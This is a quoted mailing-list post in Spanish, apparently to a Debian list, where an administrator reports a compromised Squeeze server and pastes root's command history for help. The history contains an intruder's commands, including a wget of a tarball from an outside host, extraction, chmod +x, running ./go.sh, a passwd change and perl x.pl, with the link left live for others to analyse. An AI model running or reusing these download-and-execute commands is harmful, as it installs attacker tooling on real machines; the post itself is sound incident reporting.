> Lista, buenas tardes.
>
> Perdón si este tema no esta directamente relacionado con Debian, pero
> como el server en cuestión tiene Squeeze y es un tema de seguridad creo
> que puede interesarles a mas de uno.
>
> Ayer viendo el history de root de un servidor veo lo siguiente:
>
> 314 ./go.sh 189
> 315 w
> 316 cd
> 317 cd /var/tmp/
> 318 rm -rf gosh
> 319 ls -a
> 320 exit
> 321 cat /proc/cpuinfo
> 322 passwd
> 323 cd /var/tmp/
> 324 cd gosh
> 325 touch bios.txt
> 326 chmod +x *
> 327 screen
> 328 exit
> 329 cat /proc/cpuinfo
> 330 cd /var/tmp/
> 331 ls -a
> 332 wget
http://gblteam.webs.com/gosh.tgz.tar
> 333 tar zxvf gosh.tgz.tar
> 334 rm -rf gosh.tgz.tar
> 335 cd gosh
> 336 touch bios.txt
> 337 chmod +x *
> 338 ./go.sh 200
> 339 cd
> 340 cd /var/tmp/
> 341 ls -a
> 342 rm -rf gosh
> 343 ls -a
> 344 exit
> 345 cd /var/tmp/
> 346 perl
x.pl
>
>
> Que opinan?
>
> Entiendo -lamentablemente- que el server fue comprometido, pero lo que
> no llego a comprender es el alcance de esto.
>
> Notar que puse el link para que puedan descargarlo uds. también y
> analizarlo (tomando las precauciones del caso).
>
> Bueno, si alguien tiene algo de info muy agradecido.
>
> Y si pueden recomendarme algunos pasos para analizar la seguridad del
> server desde ya muchas gracias.
>
> Salu2.
>
>